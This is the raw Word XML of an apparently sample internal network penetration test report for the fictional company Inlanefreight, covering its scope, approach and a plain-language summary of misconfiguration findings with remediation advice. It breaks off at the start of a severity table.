          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="2FCC8CE8" w14:textId="525E1AF3" w:rsidR="00FA7BF9" w:rsidRPr="00C55BC0" w:rsidRDefault="00FA7BF9" w:rsidP="00C55BC0">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00C55BC0">
              <w:t>Assessor Contact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA7BF9" w14:paraId="31BB76C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0B494EA1" w14:textId="77777777" w:rsidR="00FA7BF9" w:rsidRPr="004539C5" w:rsidRDefault="00CF69E1" w:rsidP="00C55BC0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004539C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Assessor Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="165A1F07" w14:textId="77777777" w:rsidR="00FA7BF9" w:rsidRPr="00C55BC0" w:rsidRDefault="00CF69E1" w:rsidP="00C55BC0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C55BC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Title</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A650D49" w14:textId="77777777" w:rsidR="00FA7BF9" w:rsidRPr="00C55BC0" w:rsidRDefault="00CF69E1" w:rsidP="00C55BC0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C55BC0">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assessor Contact Email </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FA7BF9" w14:paraId="0C3A1AB1"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7FC847D1" w14:textId="7E70FB6B" w:rsidR="00FA7BF9" w:rsidRPr="004539C5" w:rsidRDefault="009830DD" w:rsidP="00C55BC0">
            <w:r w:rsidRPr="00C55BC0">
              <w:t>Hack The Box Academy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3201" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41781E7A" w14:textId="77777777" w:rsidR="00FA7BF9" w:rsidRPr="00C55BC0" w:rsidRDefault="00CF69E1" w:rsidP="00C55BC0">
            <w:r w:rsidRPr="00C55BC0">
              <w:t>Security Consultant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3987" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38360A68" w14:textId="59095853" w:rsidR="00FA7BF9" w:rsidRPr="00C55BC0" w:rsidRDefault="00C55BC0" w:rsidP="00C55BC0">
            <w:r>
              <w:t>someone@htbacademy.local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61643DE1" w14:textId="77777777" w:rsidR="00C55BC0" w:rsidRDefault="00C55BC0" w:rsidP="00C55BC0">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc95329520"/>
      <w:bookmarkStart w:id="13" w:name="_Toc95329680"/>
      <w:r>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F27849" w14:textId="79DD556A" w:rsidR="00D075D5" w:rsidRDefault="002801BC" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc106718119"/>
      <w:r w:rsidRPr="00C332E5">
        <w:lastRenderedPageBreak/>
        <w:t>Executive Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="4BD8BEEC" w14:textId="3B22B58D" w:rsidR="0058681A" w:rsidRDefault="00D14781" w:rsidP="00AB5E0D">
      <w:r>
        <w:t>Inlanefreight Ltd.</w:t>
      </w:r>
      <w:r w:rsidR="002801BC">
        <w:t xml:space="preserve"> (“</w:t>
      </w:r>
      <w:r>
        <w:t>Inlanefreight</w:t>
      </w:r>
      <w:r w:rsidR="002801BC">
        <w:t xml:space="preserve">” herein) </w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1">
        <w:t>contracted</w:t>
      </w:r>
      <w:r w:rsidR="002801BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D14781">
        <w:t>Hack The Box Academy</w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1" w:rsidRPr="00FA7CD1">
        <w:t xml:space="preserve">to perform a </w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1">
        <w:t>Network</w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1" w:rsidRPr="00FA7CD1">
        <w:t xml:space="preserve"> Penetration Test of </w:t>
      </w:r>
      <w:r>
        <w:t>Inlanefreight</w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1" w:rsidRPr="00FA7CD1">
        <w:t xml:space="preserve">’s </w:t>
      </w:r>
      <w:r w:rsidR="00183CDE">
        <w:t>internally</w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1" w:rsidRPr="00FA7CD1">
        <w:t xml:space="preserve"> facing </w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1">
        <w:t>network</w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1" w:rsidRPr="00FA7CD1">
        <w:t xml:space="preserve"> to identify security weaknesses, determine the impact to </w:t>
      </w:r>
      <w:r>
        <w:t>Inlanefreight</w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1" w:rsidRPr="00FA7CD1">
        <w:t>, document all findings in a clear and repeatable manner, and provide remediation recommendations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E16E241" w14:textId="5D412221" w:rsidR="00CA09DC" w:rsidRPr="00C55BC0" w:rsidRDefault="00CA09DC" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc106718120"/>
      <w:r w:rsidRPr="00C55BC0">
        <w:t>Approach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="6EE87E78" w14:textId="422EABDD" w:rsidR="007B0529" w:rsidRDefault="00CA09DC">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D14781">
        <w:t xml:space="preserve">Hack The Box Academy </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">performed testing under a “black box” approach May 12, </w:t>
      </w:r>
      <w:r w:rsidR="00102F8A">
        <w:t>2022,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D14781">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to May 31</w:t>
      </w:r>
      <w:r w:rsidRPr="00D14781">
        <w:t xml:space="preserve">, 2022 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">without credentials or any advance knowledge of Inlanefreight’s internally facing environment with the goal of identifying unknown weaknesses. </w:t>
      </w:r>
      <w:r w:rsidRPr="002801BC">
        <w:t xml:space="preserve">Testing was performed from a non-evasive standpoint with the goal of uncovering as many misconfigurations and vulnerabilities as possible. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Testing was performed remotely via a host that was provisioned specifically for this assessment. </w:t>
      </w:r>
      <w:r w:rsidRPr="002801BC">
        <w:t>Each weakness identified was documented and manually investigated to determine exploitation possibi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lities and escalation potential. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D14781">
        <w:t xml:space="preserve">Hack The Box Academy </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sought to demonstrate the full impact of every vulnerability, up to and including internal domain compromise. If Hack The Box Academy were able to gain a foothold in the internal network, Inlanefreight allowed for further testing including lateral movement and horizontal/vertical privilege escalation to demonstrate the impact of an internal network compromise. </w:t>
      </w:r>
      <w:bookmarkStart w:id="16" w:name="_Toc95329681"/>
      <w:r w:rsidR="007B0529">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6848C132" w14:textId="77777777" w:rsidR="007369DF" w:rsidRDefault="007369DF" w:rsidP="009461AF">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0BE2CB" w14:textId="0278EAD6" w:rsidR="009461AF" w:rsidRDefault="002801BC" w:rsidP="009461AF">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc106718121"/>
      <w:r w:rsidRPr="0005031A">
        <w:t>Scope</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidRPr="0005031A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17792F80" w14:textId="73D5CD0F" w:rsidR="00253BCB" w:rsidRDefault="00091299" w:rsidP="004539C5">
      <w:r>
        <w:t>The scope of</w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1">
        <w:t xml:space="preserve"> this assessment was </w:t>
      </w:r>
      <w:r w:rsidR="005A0A2B">
        <w:t>one internal network range and the INLANEFREIGHT.LOCAL Active Directory domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271FF6D7" w14:textId="2DE4AED7" w:rsidR="00253BCB" w:rsidRDefault="00D860BB" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="HTBheading3"/>
      </w:pPr>
      <w:r w:rsidRPr="004539C5">
        <w:t>In-Scope Assets</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5718"/>
        <w:gridCol w:w="5082"/>
      </w:tblGrid>
      <w:tr w:rsidR="00253BCB" w:rsidRPr="00351832" w14:paraId="5EF89747"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2647" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="104D5FEA" w14:textId="77777777" w:rsidR="00253BCB" w:rsidRPr="0005031A" w:rsidRDefault="00253BCB" w:rsidP="004539C5">
            <w:r w:rsidRPr="0005031A">
              <w:t>Host/URL/IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2353" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="03654444" w14:textId="77777777" w:rsidR="00253BCB" w:rsidRPr="0005031A" w:rsidRDefault="00253BCB" w:rsidP="004539C5">
            <w:r w:rsidRPr="0005031A">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00253BCB" w:rsidRPr="000C6D37" w14:paraId="56426211" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
          <w:trHeight w:val="180"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2647" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="01D06FF0" w14:textId="763DEFFF" w:rsidR="00253BCB" w:rsidRPr="0005031A" w:rsidRDefault="00D14781" w:rsidP="0005031A">
            <w:r w:rsidRPr="0005031A">
              <w:t>192.168.195.0/24</w:t>
            </w:r>
            <w:r w:rsidR="00253BCB" w:rsidRPr="0005031A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2353" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3463084E" w14:textId="239CCBE9" w:rsidR="00253BCB" w:rsidRPr="0005031A" w:rsidRDefault="00D14781" w:rsidP="001C6D4A">
            <w:pPr>
              <w:keepNext/>
            </w:pPr>
            <w:r w:rsidRPr="0005031A">
              <w:t>Inlanefreight internal network</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A98DE9F" w14:textId="06402786" w:rsidR="00D860BB" w:rsidRDefault="001C6D4A" w:rsidP="001C6D4A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc95329683"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Scope Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F70F6F6" w14:textId="62CCDF5A" w:rsidR="00411940" w:rsidRDefault="00411940" w:rsidP="00411940">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc106718122"/>
      <w:r w:rsidRPr="004539C5">
        <w:t>Assessment Overview and Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="553165C8" w14:textId="77777777" w:rsidR="00CA09DC" w:rsidRDefault="00CA09DC" w:rsidP="00CA09DC">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>During the internal penetration test against Inlanefreight, Hack The Box Academy identified seven (7) findings that threaten the confidentiality, integrity, and availability of Inlanefreight’s information systems. The findings were categorized by severity level, with five (5) of the findings being assigned a high-risk rating, one (1) medium-risk, and one (1) low risk. There was also one (1) informational finding related to enhancing security monitoring capabilities within the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631A8CA2" w14:textId="77777777" w:rsidR="00CA09DC" w:rsidRDefault="00CA09DC" w:rsidP="00CA09DC">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The tester found Inlanefreight’s patch and vulnerability management to be well-maintained. None of the findings in this report were related to missing operating system or third-party patches of known vulnerabilities in services and applications that could result in unauthorized access and system compromise. Each flaw discovered during testing was related to a misconfiguration or lack of hardening, with most falling under the categories of weak authentication and weak authorization. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C922109" w14:textId="3252CF00" w:rsidR="00CA09DC" w:rsidRDefault="00CA09DC" w:rsidP="00CA09DC">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">One finding involved a network communication protocol that can be “spoofed” to retrieve passwords for internal users that can be used to gain unauthorized access if an attacker can gain unauthorized access to the network without credentials. In most corporate environments, this protocol is unnecessary and can be disabled.  It is enabled by default primarily for small and medium sized businesses that do not have the resources for a dedicated hostname resolution (the “phonebook” of your network) server.  During the assessment, the presence of these resources </w:t>
      </w:r>
      <w:r w:rsidR="00102F8A">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> observed on the network, so Inlanefreight should begin formulating a test plan to disable the dangerous service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0A0540" w14:textId="45B841CC" w:rsidR="00CA09DC" w:rsidRDefault="00CA09DC" w:rsidP="00CA09DC">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The next issue was a weak configuration involving service accounts that allows any authenticated user to steal a component of the authentication process that can often be guessed offline (via password “cracking”) to reveal the human-readable form of the account’s password. These types of service accounts typically have more privileges than a standard user, so obtaining one of their passwords in clear text could result in lateral movement or privilege escalation and eventually in complete internal network compromise. The tester also noticed that the same password was used for administrator access to all servers within the internal network. This means that if one server is compromised, an attacker can re-use this password to access any server that shares it for administrative access. Fortunately, </w:t>
      </w:r>
      <w:r w:rsidR="00102F8A">
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> issues can be corrected without the need for third-party tools.  Microsoft’s Active Directory contains settings that can be used to minimize the risk of these resources being abused for the benefit of malicious users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64783DD1" w14:textId="54A83EF4" w:rsidR="00CA09DC" w:rsidRDefault="00CA09DC" w:rsidP="00CA09DC">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A webserver was also found to be running a web application that used weak and easily guessable credentials to access an administrative console that can be leveraged to gain unauthorized access to the underlying server. This could be exploited by an attacker on the internal network without needing a valid user account. This attack is very well-documented, so it is an exceedingly likely target can be particularly damaging, even in the hands of an unskilled attacker. Ideally, direct external access to this service would be disabled, but </w:t>
      </w:r>
      <w:r w:rsidR="00102F8A">
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it cannot be, it should be reconfigured with exceptionally strong credentials that are rotated frequently.  Inlanefreight may also want to consider maximizing the log data collected from this device to ensure that attacks against it can be detected and triaged quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E86565" w14:textId="77777777" w:rsidR="00CA09DC" w:rsidRDefault="00CA09DC" w:rsidP="00CA09DC">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The tester also found shared folders with excessive permissions, meaning that all users in the internal network can access a considerable amount of data. While sharing files internally between departments and users is important to day-to-day business operations, wide open permissions on file shares may result in unintentional disclosure of confidential information. Even if a file share does not contain any sensitive information today, someone may unwittingly put such data there thinking it is protected when it isn’t. This configuration should be changed to ensure that users can access only what is necessary to perform their day-to-day duties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBF28FE" w14:textId="070059CD" w:rsidR="00704565" w:rsidRDefault="00CA09DC" w:rsidP="009418BF">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finally, the tester noticed that testing activities seemed to go mostly unnoticed, which may represent an opportunity to improve visibility into the internal network and indicates that a real-world attacker might remain undetected if internal access is achieved.  Inlanefreight should create a remediation plan based on the </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Remediation_Summary" w:history="1">
        <w:r w:rsidRPr="001E3329">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Remediation Summary</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> section of this report, addressing all high findings as soon as possible according to the needs of the business. Inlanefreight should also consider performing periodic vulnerability assessments if they are not already being performed. Once the issues identified in this report have been addressed, a more collaborative, in-depth Active Directory security assessment may help identify additional opportunities to harden the Active Directory environment, making it more difficult for attackers to move around the network and increasing the likelihood that Inlanefreight will be able to detect and respond to suspicious activity.</w:t>
      </w:r>
      <w:r w:rsidR="00704565">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AC87A0" w14:textId="3381AEE4" w:rsidR="00B8375E" w:rsidRDefault="00390B73" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc95329521"/>
      <w:bookmarkStart w:id="21" w:name="_Toc95329685"/>
      <w:bookmarkStart w:id="22" w:name="_Toc106718123"/>
      <w:r w:rsidRPr="00C332E5">
        <w:lastRenderedPageBreak/>
        <w:t>Network Penetration Test Assessment</w:t>
      </w:r>
      <w:r w:rsidR="00411940" w:rsidRPr="00C332E5">
        <w:t xml:space="preserve"> Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidR="00411940" w:rsidRPr="00C332E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DB0B62" w14:textId="111F3B1F" w:rsidR="00B8375E" w:rsidRDefault="00D14781" w:rsidP="004539C5">
      <w:r w:rsidRPr="00D14781">
        <w:t>Hack The Box Academy</w:t>
      </w:r>
      <w:r w:rsidR="007B0529" w:rsidRPr="00674E67">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B8375E" w:rsidRPr="00B8375E">
        <w:t>began all testing activities from the perspective of an unauthenticated use</w:t>
      </w:r>
      <w:r w:rsidR="007B0529">
        <w:t xml:space="preserve">r on the </w:t>
      </w:r>
      <w:r w:rsidR="00AF1255">
        <w:t>internal network</w:t>
      </w:r>
      <w:r w:rsidR="007B0529">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B8375E" w:rsidRPr="00B8375E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Inlanefreight </w:t>
      </w:r>
      <w:r w:rsidR="00B8375E" w:rsidRPr="00B8375E">
        <w:t xml:space="preserve">provided </w:t>
      </w:r>
      <w:r w:rsidR="00DC2B7D">
        <w:t>the tester</w:t>
      </w:r>
      <w:r w:rsidR="00B8375E" w:rsidRPr="00B8375E">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidR="007179EE">
        <w:t xml:space="preserve">network ranges </w:t>
      </w:r>
      <w:r w:rsidR="00B8375E" w:rsidRPr="00B8375E">
        <w:t xml:space="preserve">but did not provide additional information such as operating system or configuration information.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A65333" w14:textId="1240D4A5" w:rsidR="00704565" w:rsidRDefault="00DC2B7D" w:rsidP="00B8375E">
      <w:pPr>
        <w:pStyle w:val="HTBheading2"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc95329686"/>
      <w:bookmarkStart w:id="24" w:name="_Toc106718124"/>
      <w:r w:rsidRPr="00C332E5">
        <w:t>Summary of Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="77B5050F" w14:textId="6619A757" w:rsidR="004E4CF5" w:rsidRPr="00C332E5" w:rsidRDefault="004E4CF5" w:rsidP="004539C5">
      <w:bookmarkStart w:id="25" w:name="_Toc95329687"/>
      <w:r w:rsidRPr="00520B63">
        <w:t>During the course of testing</w:t>
      </w:r>
      <w:r w:rsidR="009418BF">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00520B63">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D14781" w:rsidRPr="00D14781">
        <w:t>Hack The Box Academy</w:t>
      </w:r>
      <w:r w:rsidR="007B0529" w:rsidRPr="00D14781">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A85451">
        <w:t xml:space="preserve">uncovered a total of seven (7) </w:t>
      </w:r>
      <w:r w:rsidRPr="00520B63">
        <w:t xml:space="preserve">findings that pose a material risk to </w:t>
      </w:r>
      <w:r w:rsidR="00D14781">
        <w:t>Inlanefreight</w:t>
      </w:r>
      <w:r w:rsidR="00A85451">
        <w:t>’s information systems. Hack The Box Academy also identified one informational finding that, if addressed, could further strengthen Inlanefreight’s overall security posture. Informational findings are observations for areas of improvement by the organization and do not represent security vulnerabilities on their own.</w:t>
      </w:r>
      <w:r w:rsidRPr="00520B63">
        <w:t xml:space="preserve"> The below table provides a summary of the findings by severity level.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2606"/>
        <w:gridCol w:w="2272"/>
        <w:gridCol w:w="3516"/>
        <w:gridCol w:w="2396"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C332E5" w:rsidRPr="00351832" w14:paraId="35C03AA2" w14:textId="77777777" w:rsidTr="00C332E5">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
          </w:tcPr>
          <w:p w14:paraId="10B61E97" w14:textId="6BD23361" w:rsidR="00C332E5" w:rsidRDefault="00C332E5" w:rsidP="00C332E5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D91E64">
              <w:t>Finding Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E4CF5" w:rsidRPr="000C6D37" w14:paraId="27876D53" w14:textId="77777777" w:rsidTr="004539C5">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2606" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A962009" w14:textId="77777777" w:rsidR="004E4CF5" w:rsidRPr="004539C5" w:rsidRDefault="004E4CF5" w:rsidP="00C332E5">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004539C5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2272" w:type="dxa"/>
          </w:tcPr>
